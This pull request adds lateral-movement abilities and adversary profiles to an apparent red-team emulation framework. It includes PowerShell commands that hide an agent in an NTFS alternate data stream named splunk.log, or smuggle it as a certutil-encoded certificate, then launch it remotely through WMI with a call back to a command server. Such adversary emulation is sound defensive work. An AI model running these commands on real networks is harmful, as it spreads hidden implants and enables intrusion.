### PR TITLE
Lateral Movement Abilities

### DIFF
--- a/data/abilities/discovery/74d1b640-7f1e-4b36-beba-23a8228f39e0.yml
+++ b/data/abilities/discovery/74d1b640-7f1e-4b36-beba-23a8228f39e0.yml
@@ -1,0 +1,34 @@
+- repeatable: false
+  name: Local FQDN
+  additional_info:
+    cleanup: '[]'
+  technique_name: host discovery
+  executors:
+  - name: psh
+    additional_info: {}
+    variations: []
+    platform: windows
+    command: '[System.Net.Dns]::GetHostByName($env:computerName).HostName'
+    code: null
+    language: null
+    payloads: []
+    timeout: 60
+    parsers:
+    - parserconfigs:
+      - source: local.host.fqdn
+        custom_parser_vals: {}
+      module: plugins.stockpile.app.parsers.basic
+    cleanup: []
+    uploads: []
+    build_target: null
+  buckets: []
+  technique_id: TA0007
+  delete_payload: false
+  tactic: discovery
+  description: Uses windows libraries to get FQDN of infected host
+  singleton: true
+  plugin: ''
+  requirements: []
+  privilege: ''
+  access: {}
+  id: 74d1b640-7f1e-4b36-beba-23a8228f39e0

--- a/data/abilities/lateral-movement/22881b9d-0efa-4ef4-9704-df0f11170cc3.yml
+++ b/data/abilities/lateral-movement/22881b9d-0efa-4ef4-9704-df0f11170cc3.yml
@@ -1,0 +1,42 @@
+- repeatable: false
+  name: Lateral Movement - esentutl
+  additional_info:
+    cleanup: '[]'
+  technique_name: 'Hide Artifacts: NTFS File Attributes'
+  executors:
+  - name: psh
+    additional_info: {}
+    variations: []
+    platform: windows
+    command: 'if("#{remote.host.fqdn}" -eq "#{local.host.fqdn}") { echo "fqdn matches
+      host, skipping to avoid repeat agents"} else { esentutl.exe /y #{location} /d
+      \\#{remote.host.fqdn}\c$\users\public\splunk.log:#{exe_name}; invoke-command
+      #{remote.host.fqdn} -scriptblock { wmic process call create "C:\users\public\splunk.log:#{exe_name}
+      -server #{server} -group red" } }'
+    code: null
+    language: null
+    payloads: []
+    timeout: 60
+    parsers: []
+    cleanup: []
+    uploads: []
+    build_target: null
+  buckets: []
+  technique_id: T1564.004
+  delete_payload: true
+  tactic: lateral-movement
+  description: Tool transfer to lateral hosts using Alternate Data Streams to hide
+    implant
+  singleton: true
+  plugin: ''
+  requirements:
+  - module: plugins.stockpile.app.requirements.not_exists
+    relationship_match:
+    - source: remote.host.fqdn
+      edge: has_agent_copy
+  - module: plugins.stockpile.app.requirements.no_backwards_movement
+    relationship_match:
+    - source: remote.host.fqdn
+  privilege: ''
+  access: {}
+  id: 22881b9d-0efa-4ef4-9704-df0f11170cc3

--- a/data/abilities/lateral-movement/22881b9d-0efa-4ef4-9704-df0f11170cc3.yml
+++ b/data/abilities/lateral-movement/22881b9d-0efa-4ef4-9704-df0f11170cc3.yml
@@ -8,11 +8,10 @@
     additional_info: {}
     variations: []
     platform: windows
-    command: 'if("#{remote.host.fqdn}" -eq "#{local.host.fqdn}") { echo "fqdn matches
-      host, skipping to avoid repeat agents"} else { esentutl.exe /y #{location} /d
+    command: 'esentutl.exe /y #{location} /d
       \\#{remote.host.fqdn}\c$\users\public\splunk.log:#{exe_name}; invoke-command
       #{remote.host.fqdn} -scriptblock { wmic process call create "C:\users\public\splunk.log:#{exe_name}
-      -server #{server} -group red" } }'
+      -server #{server} -group red" }'
     code: null
     language: null
     payloads: []

--- a/data/abilities/lateral-movement/96d3c175-5e58-424c-8350-d7514b28a075.yml
+++ b/data/abilities/lateral-movement/96d3c175-5e58-424c-8350-d7514b28a075.yml
@@ -12,7 +12,7 @@
 
       invoke-command #{remote.host.fqdn} -scriptblock { certutil -decode \\#{local.host.fqdn}\c$\users\public\com.crt
       #{location}; invoke-wmimethod -computername . -class win32_process -name Create
-      -argumentlist "C:\users\public\splunkd.exe -server http://192.168.1.124:8888
+      -argumentlist "C:\users\public\splunkd.exe -server #{server}
       -group red" }
 
       '

--- a/data/abilities/lateral-movement/96d3c175-5e58-424c-8350-d7514b28a075.yml
+++ b/data/abilities/lateral-movement/96d3c175-5e58-424c-8350-d7514b28a075.yml
@@ -1,0 +1,46 @@
+- repeatable: false
+  name: Lateral Movement - Certutil
+  additional_info:
+    cleanup: '[]'
+  technique_name: Lateral Tool Transfer
+  executors:
+  - name: psh
+    additional_info: {}
+    variations: []
+    platform: windows
+    command: 'certutil -encode #{location} C:\users\public\com.crt | out-null;
+
+      invoke-command #{remote.host.fqdn} -scriptblock { certutil -decode \\#{local.host.fqdn}\c$\users\public\com.crt
+      #{location}; invoke-wmimethod -computername . -class win32_process -name Create
+      -argumentlist "C:\users\public\splunkd.exe -server http://192.168.1.124:8888
+      -group red" }
+
+      '
+    code: null
+    language: null
+    payloads: []
+    timeout: 60
+    parsers: []
+    cleanup:
+    - rm C:\users\public\com.crt
+    uploads: []
+    build_target: null
+  buckets: []
+  technique_id: T1570
+  delete_payload: true
+  tactic: lateral-movement
+  description: Uses CertUtil as a LoL technique to move the .exe agent as a certificate
+    using windows-signed binaries
+  singleton: true
+  plugin: ''
+  requirements:
+  - module: plugins.stockpile.app.requirements.not_exists
+    relationship_match:
+    - source: remote.host.fqdn
+      edge: has_agent_copy
+  - module: plugins.stockpile.app.requirements.no_backwards_movement
+    relationship_match:
+    - source: remote.host.fqdn
+  privilege: ''
+  access: {}
+  id: 96d3c175-5e58-424c-8350-d7514b28a075

--- a/data/adversaries/1bac97ca-77fc-4c9a-835e-4de1b1b7f639.yml
+++ b/data/adversaries/1bac97ca-77fc-4c9a-835e-4de1b1b7f639.yml
@@ -1,0 +1,10 @@
+adversary_id: 1bac97ca-77fc-4c9a-835e-4de1b1b7f639
+name: Lateral Movement - Esentutl
+description: Discovers other hosts on the domain and moves binary agents using LoL
+  to disguise implant as `splunk.log` on remote host to take advantage of ADS
+atomic_ordering:
+- 74d1b640-7f1e-4b36-beba-23a8228f39e0 # Local FQDN
+- 13379ae1-d20e-4162-91f8-320d78a35e7f # Discover local hosts
+- 22881b9d-0efa-4ef4-9704-df0f11170cc3 # Lateral Movement - esentutl
+objective: 495a9828-cab1-44dd-a0ca-66e58177d8cc
+tags: []

--- a/data/adversaries/c220a8e6-609c-4d5b-9e1c-068ca01c2eec.yml
+++ b/data/adversaries/c220a8e6-609c-4d5b-9e1c-068ca01c2eec.yml
@@ -1,0 +1,10 @@
+adversary_id: c220a8e6-609c-4d5b-9e1c-068ca01c2eec
+name: Lateral Movement - Certutil
+description: discovers lateral hosts,, encodes binary into certificate for stealthy
+  lateral-movement across the network
+atomic_ordering:
+- 74d1b640-7f1e-4b36-beba-23a8228f39e0 # Local FQDN
+- 13379ae1-d20e-4162-91f8-320d78a35e7f # Discover local hosts
+- 96d3c175-5e58-424c-8350-d7514b28a075 # Lateral Movement - Certutil
+objective: 495a9828-cab1-44dd-a0ca-66e58177d8cc
+tags: []


### PR DESCRIPTION
## Description

Added two new abilities to perform lateral movement using `certutil` and `esentutl`, targeting Living off the Land capabilities. Additionally added a discovery ability that captures and stores the localhost FQDN as `#{local.host.fqdn}`, as well as two adversaries that use aforementioned abilities, respectively.

## Type of change

- [x] New feature (non-breaking change which adds functionality)

## How Has This Been Tested?

Ran operations against two virtualized hosts joined to a domain. Each adversary was tested and was shown to successfully perform their required tasks.

## Checklist:

- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code
- [ ] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works
